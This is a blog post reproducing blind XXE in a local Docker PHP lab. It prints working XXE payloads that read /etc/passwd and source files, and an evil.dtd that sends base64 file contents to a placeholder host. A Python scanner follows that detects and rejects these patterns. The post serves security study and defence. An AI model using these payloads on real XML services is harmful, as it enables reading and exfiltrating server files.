Blind XXE reproduction notes

Posted by Rootclay on 2017-05-29

Environment setup

Docker

```shell
docker run -d -p 8080:80 -v /Users/rootclay/web/xxe:/var/www/html php:apache
docker run -it -v /Users/rootclay/web/payload:/var/www/html php:apache
```
```text
.
├── /Users/rootclay/web/xxe
│   ├── index.php   --- phpinfo
│   ├── xxe1.php    --- XXE with echoed output
│   ├── xxe2.php    --- XXE without echoed output (blind)
```
```text
.
├── /Users/rootclay/web/payload
│   ├── evil.dtd
```
evil.dtd:

```dtd
<!ENTITY % payload "<!ENTITY &#x25; send SYSTEM 'http://local_ip/?content=%ttt;'>">
%payload;
```

Payload

Basic

Simple file read with echoed output.

file protocol:

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY ttt SYSTEM "file:///etc/passwd">
]>
<root>
<user>&ttt;</user>
</root>
```

php:// wrapper (base64 filter):

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY ttt SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root>
<user>&ttt;</user>
</root>
```

Blind-XXE

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % ttt SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
<!ENTITY % dtd SYSTEM "http://remote_ip/evil.dtd">
%dtd;
%send;
]>
<root></root>
```
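The three payloads above and evil.dtd share one fingerprint on the wire: a DOCTYPE whose internal subset declares SYSTEM entities (the echoed variants), or declares parameter entities and expands them inside the subset (the blind variant, where the fetched evil.dtd in turn declares the `send` entity that carries the base64 file contents out). A defender can recognise both shapes before the document ever reaches libxml. The Python below is an added example, not code from the original post; it uses only the standard library, the sample documents are the page's own payloads embedded as constructed strings (hosts kept as the placeholders `remote_ip` / `local_ip`), and the policy of rejecting any DOCTYPE at all is an assumption made for an endpoint that never legitimately needs a DTD.

```python
import re
from urllib.parse import urlsplit

# One <!ENTITY ...> declaration: general or parameter (%), with a SYSTEM
# identifier, a PUBLIC identifier plus URI, or a literal internal value.
ENTITY_DECL = re.compile(
    r"<!ENTITY\s+(?P<param>%\s+)?(?P<name>[^\s>]+)\s+"
    r"(?:SYSTEM\s+(?P<q1>[\"'])(?P<system>.*?)(?P=q1)"
    r"|PUBLIC\s+(?P<q2>[\"'])(?P<public>.*?)(?P=q2)\s+(?P<q3>[\"'])(?P<public_uri>.*?)(?P=q3)"
    r"|(?P<q4>[\"'])(?P<value>.*?)(?P=q4))",
    re.DOTALL | re.IGNORECASE,
)
# The DOCTYPE: root name, optional external identifier, optional internal subset in [...].
DOCTYPE = re.compile(
    r"<!DOCTYPE\s+[^\s\[>]+(?P<ext>[^\[>]*)(?:\[(?P<subset>.*?)\])?\s*>",
    re.DOTALL | re.IGNORECASE,
)
# A parameter-entity reference such as %dtd; (the "% name" in a declaration does not match).
PE_REF = re.compile(r"%([^\s;%]+);")
# An entity value that declares further entities, or smuggles '%' as a character
# reference, is the staging pattern of a blind-XXE .dtd file.
NESTED = re.compile(r"<!ENTITY|&#x25;|&#37;", re.IGNORECASE)


def scan_dtd(dtd_text):
    """Enumerate entity declarations and parameter-entity references in DTD text
    (an internal subset or a stand-alone .dtd file) without resolving anything."""
    entities = []
    for m in ENTITY_DECL.finditer(dtd_text):
        uri = m.group("system") if m.group("system") is not None else m.group("public_uri")
        if uri is not None:
            kind = "external"   # SYSTEM/PUBLIC: a resolving parser would fetch this URI
        elif NESTED.search(m.group("value")):
            kind = "nested"     # value declares more entities: blind-XXE staging
        else:
            kind = "internal"   # plain text replacement, harmless by itself
        entities.append({
            "name": m.group("name"),
            "parameter": m.group("param") is not None,
            "kind": kind,
            "uri": uri,
            "scheme": urlsplit(uri).scheme.lower() if uri else None,
        })
    return {"entities": entities, "pe_refs": PE_REF.findall(dtd_text)}


def assess_xml(xml_text):
    """Classify one inbound XML document. Policy (an assumption of this example):
    the endpoint never needs a DTD, so any DOCTYPE is rejected, and the report
    names the XXE pattern that was seen."""
    m = DOCTYPE.search(xml_text)
    if m is None:
        return {"doctype": False, "entities": [], "pe_refs": [], "reasons": [], "verdict": "allow"}
    report = scan_dtd(m.group("subset") or "")
    reasons = []
    if m.group("ext").strip():
        reasons.append("DOCTYPE points at an external DTD")
    for e in report["entities"]:
        label = "parameter" if e["parameter"] else "general"
        if e["kind"] == "external":
            reasons.append(f"{label} entity {e['name']} resolves an external {e['scheme']} URI")
        elif e["kind"] == "nested":
            reasons.append(f"{label} entity {e['name']} declares further entities")
    if report["pe_refs"]:
        reasons.append("parameter entities expanded in the internal subset: " + ", ".join(report["pe_refs"]))
    if not reasons:
        reasons.append("DOCTYPE present but not needed by this endpoint")
    report.update({"doctype": True, "reasons": reasons, "verdict": "reject"})
    return report


# Constructed samples: the page's payloads, with placeholder hosts.
SAMPLE_FILE_READ = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY ttt SYSTEM "file:///etc/passwd">
]>
<root><user>&ttt;</user></root>"""

SAMPLE_BLIND = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % ttt SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
<!ENTITY % dtd SYSTEM "http://remote_ip/evil.dtd">
%dtd;
%send;
]>
<root></root>"""

SAMPLE_EVIL_DTD = """<!ENTITY % payload "<!ENTITY &#x25; send SYSTEM 'http://local_ip/?content=%ttt;'>">
%payload;"""

SAMPLE_CLEAN = "<root><user>alice</user></root>"

if __name__ == "__main__":
    for name, doc in [("file read", SAMPLE_FILE_READ), ("blind", SAMPLE_BLIND), ("clean", SAMPLE_CLEAN)]:
        r = assess_xml(doc)
        print(f"{name}: {r['verdict']} {r['reasons']}")
    print("evil.dtd:", scan_dtd(SAMPLE_EVIL_DTD))
```

The scanner never resolves a URI, so it can run safely on the raw request body (or on a fetched .dtd pulled from a proxy log) and its findings can be logged as the detection record. It complements, rather than replaces, the real fix in the PHP application: never enable entity substitution (`LIBXML_NOENT`) or external DTD loading in the parser that handles untrusted input.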